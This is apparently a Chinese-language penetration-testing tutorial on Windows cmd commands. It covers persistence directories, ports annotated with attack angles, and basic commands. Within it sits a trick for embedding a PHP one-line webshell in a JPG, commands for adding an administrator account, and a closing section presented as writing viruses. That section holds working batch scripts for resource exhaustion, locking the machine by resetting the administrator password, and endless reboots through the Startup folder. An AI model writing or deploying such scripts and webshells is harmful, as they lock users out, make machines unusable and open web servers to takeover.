补充:在cmd中按TAB键自动补全,查看参数详细信息,用ping举例
ping /?
后面加上
/?
文章目录
- Windows系统与渗透相关任务目录
- 开机自启目录
- 重启后自动清空目录
- 其他常见与渗透相关目录
- 常见端口及对应的服务
- 常用的cmd命令使用
- echo
- dir
- d: 和 cd
- tree
- md 创建目录 rd 删除目录
- ipconfig
- cls
- copy 复制、拼接文件
- move移动文件
- ren重命名
- del删除文件
- ping
- type显示文本文件的内容
- reg
- nslookup -d www.baidu.com
- tasklist
- ver、winver
- start
- systeminfo
- logoff
- shutdown /s /f /t /a /r /g /l
- telnet (前提是23端口得打开)
- 配置
- 🐻:补充一点
- arp –a
- at
- win10请尽快退坑
- schtasks
- net
- cmd编写病毒
- 耗尽系统资源的病毒
- 锁机病毒
- 无限重启病毒
Windows系统与渗透相关任务目录
开机自启目录
重启后自动清空目录
其他常见与渗透相关目录
常见端口及对应的服务
端口 | 对应服务 |
21 | ftp |
23 | Telnet |
80 | web |
80-89 | 可能是web |
443 | SSL心脏滴血以及一些web漏洞测试 |
445 | SMB |
1433 | MSSQL |
1521 | Oracle |
2082/2083 | cpanel主机管理系统登陆 (国外用较多) |
2222 | DA虚拟主机管理系统登陆 (国外用较多) |
3128 | squid代理默认端口漫游内网了 |
3306 | MySQL |
3312/3311 | kangle主机管理系统登陆 |
3389 | 远程桌面 |
5432 | PostgreSQL |
5900 | vnc |
6379 | redis未授权 |
7001,7002 | WebLogic默认弱口令,反序列 |
7778 | Kloxo主机控制面板登录 |
8000-9090 | 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上 |
8080 | tomcat/WDCP主机管理系统,默认弱口令 |
8080,8089,9090 | JBOSS |
8083 | Vestacp主机管理系统 (国外用较多) |
8649 | ganglia |
8888 | amh/LuManager/宝塔 主机管理系统默认端口 |
11211 | memcache未授权访问 |
27017,27018 | Mongodb未授权访问 |
28017 | mongodb统计页面 |
常用的cmd命令使用
echo
在这里第二条命令
echo 1 > 2.txt
输出1到1.txt里面
echo 222>> 2.txt
追加222到2.txt
总结:一个
>
是覆盖,两个
>>
是追加
echo /?
显示帮助
dir
·
一个点是当前目录
..
两个点是上一层目录
d: 和 cd
tree
md 创建目录 rd 删除目录
md
-
mkdir创建目录
ipconfig
显示网络状态IP配置。然后ipconfig有个参数
/all
可以打印所有的网络信息
完整命令
ipconfig /all
cls
清屏命令
copy 复制、拼接文件
复制:
copy 1.txt ..\1.txt
拼接:
copy 1.txt+2.txt 3.txt
这里加一句图片一句话木马食用
copy tp.jpg/b+yjh.php tpyjh.jpg
move移动文件
move ..\1.txt 2.txt
ren重命名
ren 1.txt 2.txt
del删除文件
🌂:本命令删除不放入回收站直接删除
单文件:
del 1.txt
多文件:
del 1.txt 2.txt 3.txt 4.txt
ping
type显示文本文件的内容
type 1.txt
reg
nslookup -d www.baidu.com
-d
参数查看历史解析记录
## find
Add:
|
管道符
type 1.txt | find "A"
:解释打印的文档参数传给find命令并查找字符串
tasklist
tasklist
-任务列表
taskkill
-关闭任务
ver、winver
start
start cmd
start ping www.baidu.com
systeminfo
logoff
shutdown /s /f /t /a /r /g /l
telnet (前提是23端口得打开)
如果显示上面这种情况就需要手动开启
配置
2.
3.
🐻:补充一点
Telnet服务器选项则代表允许别人连接
Telnet客户端选项则连接别人
arp –a
arp为ip与物理地址的映射关系表,在渗透测试中如果拿到一台内网服务器,通过命令
arp –a
,能获得当前内网有哪些主机
at
win10请尽快退坑
at 15:47 "shutdown /r /t 0"
在之后会分配一个ID
如果要删除
at 1 /delete
schtasks
net
net主要服务用户与网络方面东西,参数很多
net stop telnet
停止服务
net start telnet
打开服务
net user
查看当前计算机用户
有点和whoami类似的感觉
net user admin 123 /add
:添加一个用户
net user admin /del
:删除一个用户
net user XX
:查看用户信息
net localfroup 用户组名字 用户名 /add
:这样就可以增加管理员权限
cmd编写病毒
采用bat脚本编写
耗尽系统资源的病毒
echo start cmd > 1.txt
echo %0 >> 1.txt
ren 1.txt 1.bat
锁机病毒
echo net user administrator 123456 > 1.bat
echo shutdown /r /t 0 >> 1.bat
无限重启病毒
echo shutdown /r /t 0 > C:\Windows\Temp\1.bat
copy C:\Windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"